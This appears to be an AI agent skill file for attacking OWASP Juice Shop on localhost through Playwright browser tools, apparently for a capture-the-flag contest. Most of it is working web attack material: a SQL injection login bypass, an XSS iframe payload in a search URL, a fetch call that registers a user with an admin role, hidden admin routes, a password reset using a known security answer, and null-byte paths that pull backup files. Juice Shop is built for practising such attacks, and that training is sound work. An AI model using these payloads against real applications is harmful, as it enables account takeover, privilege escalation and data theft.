contests/juice_shop/.claude/skills/playwright-attack/SKILL.md
# Playwright Attack Patterns

A collection of patterns for attacking Juice Shop through the Playwright MCP.

## SQLi login

```
1. browser_navigate → http://localhost:3000/#/login
2. browser_snapshot → check the element refs
3. browser_type → email: "' OR 1=1--"
4. browser_type → password: "a"
5. browser_click → Login button
```

## XSS attack

```
browser_navigate → http://localhost:3000/#/search?q=<iframe src="javascript:alert('xss')">
```

## API operations (fetch)

```javascript
browser_evaluate → function:
() => fetch('/api/Users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({email: '[email protected]', password: 'test', role: 'admin'})
}).then(r => r.json())
```

## Hidden routes

```
/#/score-board /#/administration
/#/web3-sandbox /#/tokensale-ico-ea
/ftp /metrics
/support/logs
```

## Password reset

```
1. browser_navigate → /#/forgot-password
2. browser_type → email: "[email protected]"
3. browser_type → answer: "Zaya"
4. browser_type → password: new password
5. browser_click → Reset
```

## Null-byte file paths

```
/ftp/package.json.bak%2500.md
/ftp/eastere.gg%2500.md
/ftp/coupons_2013.md.bak%2500.md
```

## Troubleshooting

"Opening in an existing browser session" error:

```
rm -rf ~/Library/Caches/ms-playwright/mcp-chrome-*
```